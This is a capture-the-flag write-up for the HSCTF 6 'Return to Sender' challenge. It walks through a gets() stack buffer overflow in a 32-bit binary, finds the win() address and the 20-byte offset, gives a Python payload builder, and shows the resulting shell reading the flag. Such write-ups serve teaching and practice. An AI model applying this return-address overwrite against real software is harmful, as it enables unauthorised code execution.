| Event | Title | Category | Cost |
|---|---|---|---|
| HSCTF 6 | Return to Sender | Binary Exploitation | ~200 |
Written by: Ptomerty
Who knew the USPS could lose a letter so many times?
nc pwn.hsctf.com 1234
Note: If you're trying to use python or a similar program to run your exploit, make sure to keep stdin alive with cat, like this: (python; cat -) | nc pwn.hsctf.com
```
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)
```
Simple buffer overflow with return address overwriting.
We want to reach this function:

```c
void win() {
    system("/bin/sh");
}
```

from this gets() call:
```c
void vuln() {
    char dest[8];
    printf("Where are you sending your mail to today? ");
    gets(dest);
    printf("Alright, to %s it goes!\n", dest);
}
```

Let's find the address of win:
```
$ objdump -t return-to-sender | grep win
080491b6 g     F .text  0000002b              win
```
And the padding before the return address:

```
$ pattern.py 50
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab
```

Check the $eip value before ret:

```
0x804922f <vuln+78> ret <0x37614136>
```

```
$ pattern.py 0x37614136
Pattern 0x37614136 first occurrence at position 20 in pattern.
```

That's enough to write the exploit.
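The offset search and payload layout above, as an added example (not the author's exp.py or pattern.py): it regenerates the Metasploit-style cyclic pattern, looks up the crashed return value 0x37614136, and packs the 20-byte padding followed by the win address from the objdump output. The pattern format and function names are assumptions; no connection to the challenge server is made.

```python
import string
import struct

WIN_ADDR = 0x080491B6  # address of win, from the objdump output on this page


def pattern_create(length):
    """Cyclic pattern of Upper/lower/digit triples: Aa0Aa1Aa2... (assumed format)."""
    out = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, max_len=26 * 26 * 10 * 3):
    """Position of a crashed 32-bit value (or 4-char string) in the pattern.

    An int is decoded little-endian, i.e. as the bytes that sat on the stack
    where the saved return address used to be; -1 means not in the pattern.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    else:
        needle = value
    return pattern_create(max_len).find(needle)


def build_payload(offset, addr):
    """Padding up to the saved EIP, then the target address (little-endian).

    gets() stops at a newline, so a 0x0a byte anywhere in the payload would
    truncate it; the caller gets an error instead of a silently broken chain.
    """
    payload = b"a" * offset + struct.pack("<I", addr)
    if b"\n" in payload:
        raise ValueError("payload contains a newline; gets() would cut it short")
    return payload


if __name__ == "__main__":
    off = pattern_offset(0x37614136)
    print("offset:", off)
    # The echo on the page is shorter than this: printf("%s") stops at the
    # first NUL byte, which is the high byte (0x08) of the address.
    print(build_payload(off, WIN_ADDR))
```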
Then we run it and get the flag:

```
$ ./exp.py
[+] Opening connection to pwn.hsctf.com on port 1234: Done
[*] Switching to interactive mode
Alright, to aaaaaaaaaaaaaaaaaaaa\xb6\x91\x0 it goes!
# cat flag
hsctf{fedex_dont_fail_me_now}
```